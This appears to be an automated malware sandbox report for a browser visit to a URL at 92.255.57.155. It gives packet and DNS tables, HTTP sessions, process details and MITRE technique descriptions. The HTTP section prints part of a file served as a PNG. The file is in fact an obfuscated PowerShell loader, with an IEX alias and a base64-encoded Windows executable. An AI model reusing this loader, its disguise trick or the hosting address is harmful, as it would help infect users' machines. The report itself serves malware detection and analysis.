Jan 8, 2025 23:20:59.029403925 CET	49680	443	192.168.2.17	20.189.173.13
Jan 8, 2025 23:21:01.439518929 CET	49680	443	192.168.2.17	20.189.173.13
Jan 8, 2025 23:21:02.106633902 CET	49675	443	192.168.2.17	204.79.197.203
Jan 8, 2025 23:21:05.361648083 CET	49682	80	192.168.2.17	192.229.211.108
Jan 8, 2025 23:21:05.663530111 CET	49682	80	192.168.2.17	192.229.211.108
Jan 8, 2025 23:21:05.901536942 CET	49716	443	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:05.901686907 CET	443	49716	92.255.57.155	192.168.2.17
Jan 8, 2025 23:21:05.901848078 CET	49716	443	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:06.251467943 CET	49680	443	192.168.2.17	20.189.173.13
Jan 8, 2025 23:21:06.267435074 CET	49682	80	192.168.2.17	192.229.211.108
Jan 8, 2025 23:21:07.478431940 CET	49682	80	192.168.2.17	192.229.211.108
Jan 8, 2025 23:21:09.891452074 CET	49682	80	192.168.2.17	192.229.211.108
Jan 8, 2025 23:21:11.708456039 CET	49675	443	192.168.2.17	204.79.197.203
Jan 8, 2025 23:21:14.511235952 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:14.516124964 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:21:14.706481934 CET	49682	80	192.168.2.17	192.229.211.108
Jan 8, 2025 23:21:14.732608080 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:21:14.785454035 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:15.852471113 CET	49680	443	192.168.2.17	20.189.173.13
Jan 8, 2025 23:21:17.109595060 CET	49696	80	192.168.2.17	199.232.214.172
Jan 8, 2025 23:21:17.109662056 CET	49697	80	192.168.2.17	199.232.214.172
Jan 8, 2025 23:21:17.114613056 CET	80	49696	199.232.214.172	192.168.2.17
Jan 8, 2025 23:21:17.114670038 CET	49696	80	192.168.2.17	199.232.214.172
Jan 8, 2025 23:21:17.114875078 CET	80	49697	199.232.214.172	192.168.2.17
Jan 8, 2025 23:21:17.114922047 CET	49697	80	192.168.2.17	199.232.214.172
Jan 8, 2025 23:21:20.906569004 CET	49715	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:20.911389112 CET	80	49715	92.255.57.155	192.168.2.17
Jan 8, 2025 23:21:24.312475920 CET	49682	80	192.168.2.17	192.229.211.108
Jan 8, 2025 23:21:37.300014019 CET	49715	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:37.305006027 CET	80	49715	92.255.57.155	192.168.2.17
Jan 8, 2025 23:21:37.305063963 CET	49715	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:39.835685968 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:39.835715055 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:39.835804939 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:39.836046934 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:39.836055040 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:40.471659899 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:40.472158909 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:40.472172022 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:40.472441912 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:40.472870111 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:40.472912073 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:40.520535946 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:50.387859106 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:50.387926102 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:50.388081074 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:51.306279898 CET	49729	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:21:51.306304932 CET	443	49729	142.250.186.68	192.168.2.17
Jan 8, 2025 23:21:59.748672009 CET	49714	80	192.168.2.17	92.255.57.155
Jan 8, 2025 23:21:59.753539085 CET	80	49714	92.255.57.155	192.168.2.17
Jan 8, 2025 23:22:02.812772989 CET	49693	443	192.168.2.17	40.126.31.69
Jan 8, 2025 23:22:02.812779903 CET	49694	80	192.168.2.17	199.232.214.172
Jan 8, 2025 23:22:02.812781096 CET	49695	80	192.168.2.17	192.229.221.95
Jan 8, 2025 23:22:02.817739010 CET	443	49693	40.126.31.69	192.168.2.17
Jan 8, 2025 23:22:02.817800999 CET	49693	443	192.168.2.17	40.126.31.69
Jan 8, 2025 23:22:02.818123102 CET	80	49695	192.229.221.95	192.168.2.17
Jan 8, 2025 23:22:02.818133116 CET	80	49694	199.232.214.172	192.168.2.17
Jan 8, 2025 23:22:02.818176985 CET	49695	80	192.168.2.17	192.229.221.95
Jan 8, 2025 23:22:02.818193913 CET	49694	80	192.168.2.17	199.232.214.172
Jan 8, 2025 23:22:12.883758068 CET	49708	443	192.168.2.17	40.126.31.69
Jan 8, 2025 23:22:12.888782978 CET	443	49708	40.126.31.69	192.168.2.17
Jan 8, 2025 23:22:12.888847113 CET	49708	443	192.168.2.17	40.126.31.69
Jan 8, 2025 23:22:39.889683008 CET	49731	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:22:39.889722109 CET	443	49731	142.250.186.68	192.168.2.17
Jan 8, 2025 23:22:39.889818907 CET	49731	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:22:39.890043020 CET	49731	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:22:39.890050888 CET	443	49731	142.250.186.68	192.168.2.17
Jan 8, 2025 23:22:40.519068956 CET	443	49731	142.250.186.68	192.168.2.17
Jan 8, 2025 23:22:40.519351959 CET	49731	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:22:40.519366026 CET	443	49731	142.250.186.68	192.168.2.17
Jan 8, 2025 23:22:40.519655943 CET	443	49731	142.250.186.68	192.168.2.17
Jan 8, 2025 23:22:40.519921064 CET	49731	443	192.168.2.17	142.250.186.68
Jan 8, 2025 23:22:40.519968033 CET	443	49731	142.250.186.68	192.168.2.17
Jan 8, 2025 23:22:40.559823036 CET	49731	443	192.168.2.17	142.250.186.68

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 23:20:35.105751038 CET	53	50298	1.1.1.1	192.168.2.17
Jan 8, 2025 23:20:35.121426105 CET	53	60204	1.1.1.1	192.168.2.17
Jan 8, 2025 23:20:36.098413944 CET	53	55483	1.1.1.1	192.168.2.17
Jan 8, 2025 23:20:39.784318924 CET	50973	53	192.168.2.17	1.1.1.1
Jan 8, 2025 23:20:39.784657001 CET	64156	53	192.168.2.17	1.1.1.1
Jan 8, 2025 23:20:39.795917034 CET	53	50973	1.1.1.1	192.168.2.17
Jan 8, 2025 23:20:39.796072960 CET	53	64156	1.1.1.1	192.168.2.17
Jan 8, 2025 23:20:53.068953991 CET	53	58694	1.1.1.1	192.168.2.17
Jan 8, 2025 23:21:11.827447891 CET	53	65097	1.1.1.1	192.168.2.17
Jan 8, 2025 23:21:34.243674994 CET	53	63787	1.1.1.1	192.168.2.17
Jan 8, 2025 23:21:35.005820990 CET	53	61811	1.1.1.1	192.168.2.17
Jan 8, 2025 23:21:54.134234905 CET	138	138	192.168.2.17	192.168.2.255
Jan 8, 2025 23:22:04.241103888 CET	53	53974	1.1.1.1	192.168.2.17

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 23:20:39.784318924 CET	192.168.2.17	1.1.1.1	0x1efc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 23:20:39.784657001 CET	192.168.2.17	1.1.1.1	0xcd6a	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 23:20:39.795917034 CET	1.1.1.1	192.168.2.17	0x1efc	No error (0)	www.google.com		142.250.186.68	A (IP address)	IN (0x0001)	false
Jan 8, 2025 23:20:39.796072960 CET	1.1.1.1	192.168.2.17	0xcd6a	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

92.255.57.155

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.17	49714	92.255.57.155	80	6448	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 23:20:38.911380053 CET	435	OUT	GET /1/1.png HTTP/1.1 Host: 92.255.57.155 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 8, 2025 23:20:39.130882025 CET	1236	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Mon, 23 Dec 2024 13:43:53 GMT Accept-Ranges: bytes ETag: "c8b79db44055db1:0" Server: Microsoft-IIS/10.0 Date: Wed, 08 Jan 2025 22:20:39 GMT Content-Length: 115261 Data Raw: 69 70 63 6f 6e 66 69 67 20 2f 66 6c 75 73 68 64 6e 73 0d 0a 0d 0a 0d 0a 20 24 74 30 3d 27 4a 4f 4f 4f 4f 49 45 58 27 2e 72 65 70 6c 61 63 65 28 27 4a 4f 4f 4f 4f 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4a 4f 4f 4f 4f 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 48 69 32 58 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 43 59 42 41 41 41 71 41 51 41 41 41 41 41 41 4d 6b 55 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 [TRUNCATED] Data Ascii: ipconfig /flushdns $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;$JOOOO="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAHi2XWcAAAAAAAAAAOAALiELATAAACYBAAAqAQAAAAAAMkUBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANhEAQBXAAAAAIABAEQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAOCUBAAAgAAAAJgEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAAoAQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABEAwAAAIABAAAEAAAAKgEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAURQEAAAAAAEgAAAACAAUA+J0AAOCmAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwAQAAAAAQAAESggAAAGKBoAAAYoAgAABioTMAoAKgEAAAIAABEgH9ieIigBAAArCigAAgAGKAQAAAYLByD80hV0KAIAACsXKNwBAAYTBBEEFijXAQAGKAUAAAaiEQQoBgAABgw
Jan 8, 2025 23:20:39.130906105 CET	1236	IN	Data Raw: 67 44 4a 4d 5a 7a 53 42 47 68 30 54 6a 59 53 55 54 42 68 78 65 52 51 59 41 41 41 41 46 41 41 41 41 4a 51 41 41 41 4a 49 41 41 41 41 2f 41 41 41 41 73 67 41 41 41 4e 50 2f 2f 2f 38 34 72 51 41 41 41 42 54 2b 42 67 4d 41 41 41 5a 7a 64 67 41 41 43 Data Ascii: gDJMZzSBGh0TjYSUTBhxeRQYAAAAFAAAAJQAAAJIAAAA/AAAAsgAAANP///84rQAAABT+BgMAAAZzdgAACigLAAAGDQkXKAwAAAYgRl3X5iuzfuAAAAQoCgAABhEGILex4thaIAVIwCRhK5kgQYb18ygDAAArCBQXKOMAAAYTBREFFgYgNNm2TSgBAAArKAcAAAaiEQUoCAAABigJAAAGLAggBJFpTyUrBiCBiN4hJSYRBiCxgY
Jan 8, 2025 23:20:39.130918026 CET	448	IN	Data Raw: 41 41 42 4d 77 42 41 41 47 41 41 41 41 41 51 41 41 45 53 67 31 41 51 41 47 4b 67 41 41 45 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 68 46 41 67 41 47 4b 67 41 54 4d 41 51 41 42 77 41 41 41 41 45 41 41 42 45 43 4b 46 55 43 41 41 59 71 41 Data Ascii: AABMwBAAGAAAAAQAAESg1AQAGKgAAEzAEAAcAAAABAAARAihFAgAGKgATMAQABwAAAAEAABECKFUCAAYqABMwBAAHAAAAAQAAEQIoRQIABioAEzAEAAcAAAABAAARAihOAQAGKgATMAgAjQEAAAQAABECKDECAAYKION5QZkg3isCvGElEwkfDV5FDQAAAOIAAAAhAQAAMgAAAIIAAAC2////YgAAAAQBAAAFAAAAGwAAAEUAAA
Jan 8, 2025 23:20:39.130923033 CET	1236	IN	Data Raw: 62 69 54 67 6e 2f 2f 2f 2f 45 51 51 58 57 42 4d 45 45 51 6b 67 37 56 53 45 50 56 6f 67 34 46 69 2f 68 57 45 34 44 76 2f 2f 2f 33 4d 76 41 41 41 47 43 78 45 4a 49 46 48 62 46 47 35 61 49 43 42 61 36 2b 52 68 4f 50 58 2b 2f 2f 38 4a 61 53 68 34 41 Data Ascii: biTgn////EQQXWBMEEQkg7VSEPVog4Fi/hWE4Dv///3MvAAAGCxEJIFHbFG5aICBa6+RhOPX+//8JaSh4AQAGEwYRCSBAkCJ6WiBJpF4CYTjZ/v//CREF0m4eEQRaHz9fYmANEQkgAklFy1og9RNXJWE4t/7//xEGFyggAQAGEwcRCSCdfUnLWiBWABG7YTia/v//BiiZAQAGHw1qWRMIBwYRBxEICW80AAAGEQYqAAAAEzAIAN
Jan 8, 2025 23:20:39.130934954 CET	1236	IN	Data Raw: 68 4f 44 7a 39 2f 2f 38 49 45 51 51 4a 6e 68 45 4d 49 44 45 37 6f 5a 46 61 49 4c 67 6a 48 6f 39 68 4f 43 54 39 2f 2f 38 67 33 43 72 34 2b 51 30 52 44 43 41 69 2b 4e 4c 30 57 69 42 56 6c 59 7a 6d 59 54 67 4c 2f 66 2f 2f 45 51 67 52 42 69 55 58 57 Data Ascii: hODz9//8IEQQJnhEMIDE7oZFaILgjHo9hOCT9//8g3Cr4+Q0RDCAi+NL0WiBVlYzmYTgL/f//EQgRBiUXWBMGEQsfGGTSnAgRCo9eAAABJXFeAAABEQthgV4AAAERDCBNc7tYWiBkg5m1YTjS/P//EQcfDhEHHw6VCB8OlWGeEQcfDxEHHw+VCB8PlWGeEQwg7CJMV1og9hZ23WE4ofz//xYTBREMIKcoIxJaIJXcdX5hOIv8//
Jan 8, 2025 23:20:39.130945921 CET	448	IN	Data Raw: 6d 4f 47 37 2b 2f 2f 39 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 35 69 59 48 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 66 45 47 4a 67 66 67 45 41 41 41 51 43 4a 52 64 59 45 Data Ascii: mOG7+//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBBEHIObhkKFaIGsy9OlhOBr+//8CIP///z9fEAARByBbEVqtWiDk3sISYTj+/f//EQcgFyrQQ1ogTnrwo2E46/3//xEHIHi+7/ZaIHS4jZ9hONj9//8GbhZqMwggiYRURyUrBiCSlgIVJSY4vv3//w
Jan 8, 2025 23:20:39.130954981 CET	1236	IN	Data Raw: 47 70 51 45 41 41 42 73 4c 45 51 63 67 55 39 33 4f 61 6c 6f 67 31 36 33 37 35 32 45 34 43 76 33 2f 2f 77 63 71 45 7a 41 4a 41 47 73 43 41 41 41 47 41 41 41 52 41 69 41 48 52 4a 38 51 57 69 41 48 30 59 5a 65 59 52 41 41 41 68 38 65 5a 41 6f 67 65 Data Ascii: GpQEAABsLEQcgU93Oalog163752E4Cv3//wcqEzAJAGsCAAAGAAARAiAHRJ8QWiAH0YZeYRAAAh8eZAogesMaFiD3+S8EYSUTBx8LXkULAAAAvv///xEBAAD2AAAAEwIAABwAAACxAAAAyAEAAPkBAACTAQAAgAEAAAUAAAA4DgIAAAZuGWozCCCuEJR7JSsGIHjE5WIlJiunfgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYm
Jan 8, 2025 23:20:39.130968094 CET	1236	IN	Data Raw: 6c 41 51 41 41 47 77 73 52 42 79 44 55 6e 31 36 73 57 69 44 35 41 72 5a 36 59 54 6a 38 2f 76 2f 2f 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 58 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 Data Ascii: lAQAAGwsRByDUn16sWiD5ArZ6YTj8/v//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwURByAV/mzhWiDg2PFAYTio/v//AhhiEAAGbhZqMwgg6CSLcyUrBiBk+ipCJSYRByAqaW+JWmE4gP7//9ABAAAbKCUCAAYoSQIABhEFKBACAAYTBn4BAAAEAhEGFh
Jan 8, 2025 23:20:39.131033897 CET	448	IN	Data Raw: 69 59 42 4d 46 30 41 45 41 41 42 73 6f 4a 51 49 41 42 69 68 4a 41 67 41 47 45 51 55 6f 45 41 49 41 42 68 4d 47 66 67 45 41 41 41 51 43 45 51 59 57 45 51 51 61 57 53 6a 70 41 51 41 47 45 51 63 67 6e 6f 67 57 41 56 6f 67 38 4a 6c 4e 4d 47 45 34 54 Data Ascii: iYBMF0AEAABsoJQIABihJAgAGEQUoEAIABhMGfgEAAAQCEQYWEQQaWSjpAQAGEQcgnogWAVog8JlNMGE4Tf7//xIB/hUBAAAbEQcgtbIUFlogRTafIWE4Mv7//wIfHmQKEQcg8QaEDFogk2zcomE4Gv7//xEHIJfa9l5aIOEdJIJhOAf+//8JFqMBAAAbCxEHIH8cE6JaIBV5m+1hOOz9//9+AQAABAIlF1gQAOCRfgEAAAQCJR
Jan 8, 2025 23:20:39.131046057 CET	1236	IN	Data Raw: 42 41 41 41 75 41 67 41 41 76 51 45 41 41 45 6b 41 41 41 42 52 41 67 41 41 42 51 41 41 41 42 77 41 41 41 41 41 41 67 41 41 50 67 45 41 41 46 45 42 41 41 43 6c 41 51 41 41 73 76 2f 2f 2f 7a 68 4d 41 67 41 41 42 6d 34 5a 61 6a 4d 49 49 4b 67 49 34 Data Ascii: BAAAuAgAAvQEAAEkAAABRAgAABQAAABwAAAAAAgAAPgEAAFEBAAClAQAAsv///zhMAgAABm4ZajMIIKgI44olKwYgJu5isyUmK5sXjQEAABsNfgEAAAQCCRb+HAEAABso6QEABhEHIH998jpaIPeoglVhOG7///9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYm
Jan 8, 2025 23:20:39.135889053 CET	1236	IN	Data Raw: 47 62 6a 49 49 49 41 2b 32 56 2f 49 6c 4b 77 59 67 37 4d 69 67 68 53 55 6d 4f 4f 4c 2b 2f 2f 38 57 45 77 59 52 44 43 43 72 70 78 65 62 57 69 43 4e 75 42 5a 48 59 54 6a 4d 2f 76 2f 2f 45 51 6b 66 45 43 38 49 49 49 6e 39 70 74 45 6c 4b 77 59 67 64 Data Ascii: GbjIIIA+2V/IlKwYg7MighSUmOOL+//8WEwYRDCCrpxebWiCNuBZHYTjM/v//EQkfEC8IIIn9ptElKwYgdy/w3CUmOLL+//8RBx4RBx6VCB6VYZ4RDCBuem8pWiBxXjrdYTiT/v//EQwgQoQpjlogGe8LwmE4gP7//wkJHw1kYQ0gqOgjuDhv/v//EQcXEQcXlQgXlWGeEQcYEQcYlQgYlWGeEQcZEQcZlQgZlWGeEQcaEQcalQ
Jan 8, 2025 23:20:39.515044928 CET	377	OUT	GET /favicon.ico HTTP/1.1 Host: 92.255.57.155 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://92.255.57.155/1/1.png Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 8, 2025 23:20:39.736413956 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 Date: Wed, 08 Jan 2025 22:20:39 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Jan 8, 2025 23:21:14.511235952 CET	547	OUT	GET /1/1.png HTTP/1.1 Host: 92.255.57.155 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 If-None-Match: "c8b79db44055db1:0" If-Modified-Since: Mon, 23 Dec 2024 13:43:53 GMT
Jan 8, 2025 23:21:14.732608080 CET	93	IN	HTTP/1.1 304 Not Modified Date: Wed, 08 Jan 2025 22:21:14 GMT Etag: "c8b79db44055db1:0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.17	49715	92.255.57.155	80	6448	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 23:21:20.906569004 CET	6	OUT	Data Raw: 00 Data Ascii:

Target ID:	0
Start time:	17:20:33
Start date:	08/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	17:20:34
Start date:	08/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1960,i,9567943827723971082,11944864733081226012,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	17:20:35
Start date:	08/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://92.255.57.155/1/1.png"
Imagebase:	0x7ff7d6f10000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

